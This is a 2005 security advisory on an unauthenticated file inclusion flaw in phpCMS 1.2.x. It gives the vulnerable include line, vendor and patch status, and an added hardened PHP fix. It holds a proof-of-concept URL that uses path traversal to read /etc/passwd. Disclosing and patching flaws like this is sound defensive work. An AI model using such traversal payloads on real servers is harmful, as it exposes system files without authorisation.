SEC-CONSULT SA20050602-1 :: Arbitrary File Inclusion in phpCMS 1.2.x



Bernhard Müller
02/06/05, 20:45

SEC-CONSULT Security Advisory 20050602-1
=======================================================================
title: Arbitrary File Inclusion in phpCMS 1.2.x
program: phpCMS
vulnerable version: 1.2.0, 1.2.1, 1.2.1pl1
homepage: www.phpcms.de
found: 2005-05-31
by: sk0L / SEC-CONSULT / www.sec-consult.com
=======================================================================

vendor description:
---------------
phpCMS is a content management system, which convinces in particular by
small system requirements, high performance and above all its flexibility.


vulnerability overview:
---------------
a flaw in phpCMS makes it possible to include arbitrary files on the server.
as the "include" statement is called before any session checks occur,
this vulnerability can be exploited without any prior authentication.


proof of concept:
---------------

the vulnerable include call resides in class.layout_phpcms.php:

if(isset($_GET['language']) && $_GET['language'] != '') {
include($PHPCMS_INCLUDEPATH.'/language.'.$_GET[language]);
[...]

so you are able to do something like:

http://vu1n.com/parser/parser.php?&phpcmsaction=FILEMANAGER&language=de/../../../../../../../etc/passwd
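As an added illustration (not code from the advisory or from phpCMS), the hardened form of the include call quoted above: the `language` value is only used if it matches a short allowlisted pattern and the resolved path stays inside the include directory. The file layout (`$PHPCMS_INCLUDEPATH/language.<code>`), the fallback language and the function name `resolve_language_file` are assumptions made for this example.

```php
<?php
// Added example, not phpCMS code: a hardened replacement for the include call
// quoted in the advisory. Assumed layout: language resources live directly
// under $PHPCMS_INCLUDEPATH and are named language.<code> (e.g. language.de).

const DEFAULT_LANGUAGE = 'de';   // assumption: the site's fallback language

/**
 * Map a user-supplied language tag to an absolute file path, or return null
 * when the value must not be included.
 */
function resolve_language_file(string $includePath, string $requested): ?string
{
    // Step 1: syntactic allowlist. A language tag is a short lowercase code
    // such as "de" or "en" (optionally "de-at"). Anything containing "/", "..",
    // NUL bytes, stream wrappers or other characters is rejected here.
    if (!preg_match('/^[a-z]{2,3}(-[a-z]{2})?$/', $requested)) {
        return null;
    }

    // Step 2: canonical-path containment. Resolve both the base directory and
    // the candidate and confirm the candidate lies inside the base. This is
    // defence in depth against symlinks or cases the regex did not anticipate.
    $base = realpath($includePath);
    $candidate = realpath($includePath . '/language.' . $requested);
    if ($base === false || $candidate === false || !is_file($candidate)) {
        return null;   // directory or language file does not exist
    }
    $prefix = $base . DIRECTORY_SEPARATOR;
    if (strncmp($candidate, $prefix, strlen($prefix)) !== 0) {
        return null;   // resolved outside the include directory
    }
    return $candidate;
}

// Vulnerable shape from the advisory, kept here only for contrast:
//   if (isset($_GET['language']) && $_GET['language'] != '') {
//       include($PHPCMS_INCLUDEPATH.'/language.'.$_GET[language]);
//   }
//
// Hardened shape: the request value never reaches include() unvalidated, and a
// rejected value falls back to the default instead of being used or echoed.
$requested = isset($_GET['language']) ? (string) $_GET['language'] : DEFAULT_LANGUAGE;
$file = resolve_language_file($PHPCMS_INCLUDEPATH, $requested)
     ?? resolve_language_file($PHPCMS_INCLUDEPATH, DEFAULT_LANGUAGE);
if ($file !== null) {
    include $file;
}
```

The regex alone already rejects the traversal value from the proof of concept; the `realpath` containment check is kept because it also covers values that are syntactically valid but resolve elsewhere (for example through a symlink). A rejected `language` value is a useful signal to log, since legitimate clients never send one.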


vulnerable versions:
---------------

according to Ignatius from the phpCMS Core Team, the vulnerable code
line was introduced in phpCMS 1.2.0. older versions are not affected by
this vulnerability.


vendor status:
---------------
vendor notified: 2005-05-31
vendor response: immediately
patch available: 2005-06-01

the vulnerability has been addressed in phpCMS 1.2.1pl2. additionally,
patches for the affected versions have been made available by the vendor.

http://www.phpcms.de/download/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Bernhard Mueller / www.sec-consult.com /
SGT ::: dfa, tke, bfi, mei, flo, walter|bruder :::

